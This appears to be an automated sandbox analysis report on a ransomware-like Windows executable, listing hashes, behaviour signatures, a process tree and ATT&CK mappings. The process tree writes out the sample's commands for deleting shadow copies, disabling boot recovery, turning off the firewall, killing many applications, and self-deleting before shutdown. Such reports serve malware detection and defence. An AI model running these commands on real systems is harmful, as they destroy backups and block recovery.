Analysis

  • max time kernel
    57s
  • max time network
    83s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    27-07-2021 03:33

Errors

Reason
Remote task has failed: Machine shutdown

General

  • Target

    730DBBFB.exe

  • Size

    169KB

  • MD5

    65c3956288e16bdcc55e3c9c6b94ba5b

  • SHA1

    33aa83e00711a32e0960dcf670ae2fa891049170

  • SHA256

    e7fe3b83e1730593d372b5a848e84066c07d75ee4790395a258822cfb8502412

  • SHA512

    813db16eeacf96589468881872ec15e55760dacf27f90060298972036ab22243337abd5f9bce266063a89fccc45ded069cb4bb4172946acc4a54e5ac49853c76

Score
9/10

Malware Config

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Deletes itself 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 13 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 62 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\730DBBFB.exe
    "C:\Users\Admin\AppData\Local\Temp\730DBBFB.exe"
    1⤵
    • Modifies extensions of user files
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:592
    • C:\Windows\system32\cmd.exe
      cmd.exe /c vssadmin delete shadows /all /quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1908
      • C:\Windows\system32\vssadmin.exe
        vssadmin delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:820
    • C:\Windows\system32\cmd.exe
      cmd.exe /c wmic shadowcopy delete /nointeractive
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1928
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic shadowcopy delete /nointeractive
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:824
    • C:\Windows\system32\cmd.exe
      cmd.exe /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2008
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {current} bootstatuspolicy ignoreallfailures
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:1332
    • C:\Windows\system32\cmd.exe
      cmd.exe /c bcdedit /set {current} recoveryenabled no
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2028
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {current} recoveryenabled no
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:1372
    • C:\Windows\system32\cmd.exe
      cmd.exe /c netsh advfirewall set allprofiles state off
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2032
      • C:\Windows\system32\netsh.exe
        netsh advfirewall set allprofiles state off
        3⤵
          PID:1228
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c taskkill /f /im note*
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:908
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im note*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1192
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c taskkill /f /im powerpnt*
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1452
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im powerpnt*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1300
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c taskkill /f /im tomcat*
        2⤵
          PID:1964
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im tomcat*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1812
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c taskkill /f /im java*
          2⤵
            PID:1612
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im java*
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2144
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c taskkill /f /im vee*
            2⤵
              PID:1580
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im vee*
                3⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2232
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c taskkill /f /im post*
              2⤵
                PID:2052
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im post*
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2244
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im mys*
                2⤵
                  PID:2108
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im mys*
                    3⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2256
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /c taskkill /f /im python*
                  2⤵
                    PID:1072
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im apache*
                    2⤵
                      PID:220
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /c taskkill /f /im sql*
                      2⤵
                        PID:1172
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /c taskkill /f /im Exchange*
                        2⤵
                          PID:564
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /c taskkill /f /im excel*
                          2⤵
                            PID:1504
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c taskkill /f /im winword*
                            2⤵
                              PID:1772
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c ping 127.0.0.1>nul & del /q C:\Users\Admin\AppData\Local\Temp\730DBBFB.exe & shutdown -s -t 0
                              2⤵
                              • Deletes itself
                              PID:2656
                              • C:\Windows\SysWOW64\PING.EXE
                                ping 127.0.0.1
                                3⤵
                                • Runs ping.exe
                                PID:2684
                              • C:\Windows\SysWOW64\shutdown.exe
                                shutdown -s -t 0
                                3⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2716
                          • C:\Windows\system32\vssvc.exe
                            C:\Windows\system32\vssvc.exe
                            1⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1940
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im excel*
                            1⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:640
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im Exchange*
                            1⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2012
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im sql*
                            1⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1936
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im python*
                            1⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2164
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im apache*
                            1⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2080
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im winword*
                            1⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:228
                          • C:\Windows\system32\LogonUI.exe
                            "LogonUI.exe" /flags:0x0
                            1⤵
                              PID:2744
                            • C:\Windows\system32\AUDIODG.EXE
                              C:\Windows\system32\AUDIODG.EXE 0x578
                              1⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2796
                            • C:\Windows\system32\LogonUI.exe
                              "LogonUI.exe" /flags:0x1
                              1⤵
                                PID:2948

                              Network

                              MITRE ATT&CK Matrix ATT&CK v6

                              Persistence

                              Modify Existing Service

                              1
                              T1031

                              Defense Evasion

                              File Deletion

                              2
                              T1107

                              Discovery

                              Remote System Discovery

                              1
                              T1018

                              Impact

                              Inhibit System Recovery

                              3
                              T1490

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • memory/220-83-0x0000000000000000-mapping.dmp
                              • memory/228-82-0x0000000000000000-mapping.dmp
                              • memory/564-79-0x0000000000000000-mapping.dmp
                              • memory/592-60-0x0000000010000000-0x000000001001C000-memory.dmp
                                Filesize

                                112KB

                              • memory/640-84-0x0000000000000000-mapping.dmp
                              • memory/820-71-0x0000000000000000-mapping.dmp
                              • memory/824-69-0x0000000000000000-mapping.dmp
                              • memory/908-73-0x0000000000000000-mapping.dmp
                              • memory/1072-89-0x0000000000000000-mapping.dmp
                              • memory/1172-80-0x0000000000000000-mapping.dmp
                              • memory/1192-75-0x0000000000000000-mapping.dmp
                              • memory/1228-68-0x0000000000000000-mapping.dmp
                              • memory/1228-72-0x000007FEFB9A1000-0x000007FEFB9A3000-memory.dmp
                                Filesize

                                8KB

                              • memory/1300-78-0x0000000000000000-mapping.dmp
                              • memory/1332-70-0x0000000000000000-mapping.dmp
                              • memory/1372-67-0x0000000000000000-mapping.dmp
                              • memory/1452-74-0x0000000000000000-mapping.dmp
                              • memory/1504-77-0x0000000000000000-mapping.dmp
                              • memory/1580-90-0x0000000000000000-mapping.dmp
                              • memory/1612-88-0x0000000000000000-mapping.dmp
                              • memory/1772-76-0x0000000000000000-mapping.dmp
                              • memory/1812-87-0x0000000000000000-mapping.dmp
                              • memory/1908-62-0x0000000000000000-mapping.dmp
                              • memory/1928-63-0x0000000000000000-mapping.dmp
                              • memory/1936-86-0x0000000000000000-mapping.dmp
                              • memory/1964-81-0x0000000000000000-mapping.dmp
                              • memory/2008-64-0x0000000000000000-mapping.dmp
                              • memory/2012-85-0x0000000000000000-mapping.dmp
                              • memory/2028-65-0x0000000000000000-mapping.dmp
                              • memory/2032-66-0x0000000000000000-mapping.dmp
                              • memory/2052-91-0x0000000000000000-mapping.dmp
                              • memory/2080-92-0x0000000000000000-mapping.dmp
                              • memory/2108-93-0x0000000000000000-mapping.dmp
                              • memory/2144-94-0x0000000000000000-mapping.dmp
                              • memory/2164-95-0x0000000000000000-mapping.dmp
                              • memory/2232-96-0x0000000000000000-mapping.dmp
                              • memory/2244-97-0x0000000000000000-mapping.dmp
                              • memory/2256-98-0x0000000000000000-mapping.dmp
                              • memory/2656-99-0x0000000000000000-mapping.dmp
                              • memory/2684-100-0x0000000000000000-mapping.dmp
                              • memory/2716-101-0x0000000000000000-mapping.dmp
                              • memory/2744-103-0x0000000002840000-0x0000000002841000-memory.dmp
                                Filesize

                                4KB

                              • memory/2948-105-0x00000000026E0000-0x00000000026E1000-memory.dmp
                                Filesize

                                4KB